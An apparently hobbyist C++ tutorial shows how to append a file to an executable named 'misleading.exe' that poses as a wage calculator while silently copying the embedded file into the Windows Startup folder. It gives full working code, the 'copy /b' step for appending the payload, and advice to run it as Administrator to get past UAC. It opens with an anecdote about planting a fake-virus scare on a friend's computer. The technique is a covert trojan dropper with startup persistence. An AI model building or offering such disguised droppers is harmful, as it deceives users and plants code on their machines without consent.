Embedding
At some point in learning I wanted to be mischievous for fun. I was thinking, what
if I could deploy a program from a program without the user knowing :) I wrote a fun
little program asking the user ( a friend ) for some information and while he was working
on it I deployed a fake virus program into his Startup folder. The next day when he started
up his computer the fake virus program ran saying a virus was found and to press the OK
button to remove it. When the Ok key was pressed a bunch of lines popped up notifying him that
all the files on his computer were being erased. Of course they were not but it was good fun.
For the app below we will be less mischievous and simply deploy a .txt file to the Startup
folder to show up the next boot :) You can be more creative if you choose. Use your powers
for good ;)
here is the high level...
we are going to append the startup.txt file at the end of your program
(we'll call it misleading.exe). Then when the user runs misleading.exe
we will have it go to the starting point of startup.txt and copy that out of misleading.exe.
ok so first we're going to concentrate on writing the part of the program that
copies the file startup.txt (embedded at the end of your exe) to the destination folder.
the plan of attack is to use fopen to open up the exe, pretend your file
is embeddded at the end of it, and seek backwards in the file until we get to the start of your startup.txt file.
Create a .txt file and name it startup.txt. Type something funny in it.
next, right click startup.txt and look at the total size in bytes.
It will say Size: xxxKB ( xxx, xxx bytes ). write down this number, this is how big the file is.
in the new program you are writing, use fopen and open the program itself.
for instance, if it's called misleading.exe. you can do fopen( "misleading.exe", "rb" )
the next thing we want to do is seek to the end of misleading.exe and then back up the amount of startup.txt.
The new function you now will learn is fseek. this lets you move around a file when it is open.
fseek( filePointer, amount to seek, place to seek from );
"place to seek from" can be one of 3 things
SEEK_SET //start seeking from the beginning of the file
SEEK_CUR //seek from whereever we currently are in the file
SEEK_END //seek from the end of the file
SEEK_END is what we want to use, let's say you have already opened the file, we want to seek back
the amount of bytes your startup.txt file is. lets say your file is 10,000 bytes. we would do
fseek( pFile, -10000, SEEK_END );
this tells the program to go to the end of the executable and then backup 10,000 bytes. this way, when we embed
the startup.txt file to the end of your exe - running fseek will put us exactly where the startup.txt file starts.
The next step is to copy startup.txt out of misleading.exe. To do that we need
to make a buffer big enough to hold startup.txt in ram. we will then read the appended
startup.txt into ram and save it out into its own file. did that make a little bit of sense?
We are working with a small text file here but chances are you will use a much bigger .exe so let's learn about a buffer :)
A buffer is an array of bytes in memory that you use to hold whatever
values you want. Remember, to the computer everything is just values in memory addresses,
it doesn't matter what those values are. It is common to make a buffer with unsigned chars,
also called BYTEs. However it could be created with any data type. we are going to use an
array of unsigned chars for our buffer.
dynamic memory allocation...
now, lets say that startup.txt is 364,544 bytes (or unsigned chars). you could make your buffer like this:
unsigned char buffer[ 364544 ]; the only problem with this is, it's way too much memory
to ask for all at once when the program starts - here is why: any variable you have declared
in functions (like main) get put on something called "the stack". the stack has to be large
enough to hold every variable in a function, normally the stack holds a few ints, floats, etc. -
if your buffer is an array of variables 364544 long, that is pretty large for the stack. instead,
we're going to ask windows for the memory. when we do this, windows assigns us a pointer to some
free ram. we use the "new" command for that.
unsigned char *pBuffer = new unsigned char[ 364544 ];
this is telling windows we want a new array of unsigned chars that is 364544 unsigned chars long.
windows will find available memory and assign it to our pBuffer pointer. I hope this made sense.
now that your buffer has been allocated, you want to use fread to read from
the point you are currently at in the file, to the amount of bytes your startup.txt
file is. you want to read this into your pBuffer array you allocated from windows.
ok once you have made it here, your startup.txt file is now in ram, beginning at the address pBuffer points to.
you can now close your file that was opened with fopen, because we have the startup.txt file in memory.
the next step is to open a new file for writing "wb" and write the file ( startup.txt ) to the file using fwrite. for our purposes,
we want to open a file for writing in the users startup folder and call it /startup.txt. For example
FILE *pFile = fopen( "C:\\Documents and Settings\\Coder\\
Start Menu\\Programs\\startup\\startup.txt", "wb" );
when you're done writing be sure to close the file!
after the file has been written we want to tell windows we are done with the memory it gave us for pBuffer. we do this by using the delete call:
delete [] pBuffer;
this tells windows to delete all the memory associated with the array of bytes it gave us at the pBuffer address.
Compile the program BUT DON'T RUN IT !!
after writing this, you still can't run the program because we haven't appended startup.txt
to the end of it. here is that last step...take your program misleading.exe and startup.txt
and place them in the same directory. then you navigate to that directory through the command
prompt. once you are in the directory type this...
copy /b misleading.exe+startup.txt misleading.exe
this uses DOS' copy command to append startup.txt to the end of your new program "misleading.exe". after you
do that, anytime you run misleading.exe it will extract startup.txt and place it in the startup folder :)
the startup folder path is user specific. I show you how to get the path to the Startup folder in the code below
to get the path regardless of the user :)
One last thing, if you are running MS Vista you will have to use "Run as Administrator" if you have UAC enabled.
Right click the .exe and select "Run as Administrator". Otherwise Vista blocks our fun.
Wow....sorry so long :)
__________________________________________________________
#define _CRT_SECURE_NO_DEPRECATE
#include <stdio.h>
#include <string.h>
#include <conio.h>
#include <stdlib.h>
#include <shlobj.h>
void main()
{
char path[260];
char filepath[260];
float a,b;
double c;
//Open the .exe of this .cpp ( remember
//this is a binary file!!!)
FILE *pFile = fopen("misleading.exe","rb");
//MY text file contains the word "SURPRISE"
//open the properties of the .exe or .txt
//that you want to append to the end of this
//.exe and get the size (bytes) of the file
//Use fseek to move the file position indicator
//to the spot you want to access in the file
//SEEK_END indicates that you want to count from
//the end of the file " bottom to top"
//-8 is how many bytes from the bottom(end)
//you want to count back( size of file
//that you want to append.) -8 will take
//you to the beginning of the appended file
fseek( pFile, -8, SEEK_END );
//allocate memory for the file to fill( the stack
//only allocates a small amount of ram
//and so not to freak out the small stack
//we allocate a larger chunk from windows
unsigned char *pBuffer = new unsigned char[ 8 ];
//now that we are at the beginning of our file,
//we want to use fread to read the contents
//of our file (8 bytes) into windows memory(pBuffer)
fread( pBuffer, 8, 1, pFile );
//close your file
fclose(pFile);
//This will be the name of the file you are to copy to
//the start up folder ( or anywhere else )
//F1 SHGetFolderPath and CSIDL !!
//CSIDL_COMMON_STARTUP will give me the path to the
//startup folder :)
SHGetFolderPath( NULL, CSIDL_COMMON_STARTUP, NULL,
SHGFP_TYPE_CURRENT,path );
sprintf( filepath, "%s\\startup.txt", path );
//Since the user may have already ran the program
//we don't need to reinstall the file again. We will
//check it here.
pFile = fopen( filepath, "rb" );
if ( pFile != 0 )
{
//close your file
fclose(pFile);
//Tell windows we are done with the memory it gave us
delete [] pBuffer;
}
else
{
//Open directory and create a new file "wb".
pFile = fopen( filepath, "wb" );
//use fwrite to copy the contents of
//pBuffer ( your file in windows memory) to
//the file you just created
fwrite( pBuffer, 8, 1, pFile );
//close your file
fclose(pFile);
//Tell windows we are done with the memory it gave us
delete [] pBuffer;
}
printf( " What is your hourly wage?:" );
scanf("%f",&a);
printf( " How many hours per week do you work?:");
scanf("%f",&b);
c=a*b;
printf( " Your weekly income is: $ %.2f\n",c);
c=52*(a*b);
printf( " Your yearly income: $ %.2f\n",c);
c=0.80*(52*a*b);
printf( " After taxes (roughly): $ %.2f\n",c);
getch();
return;
}
|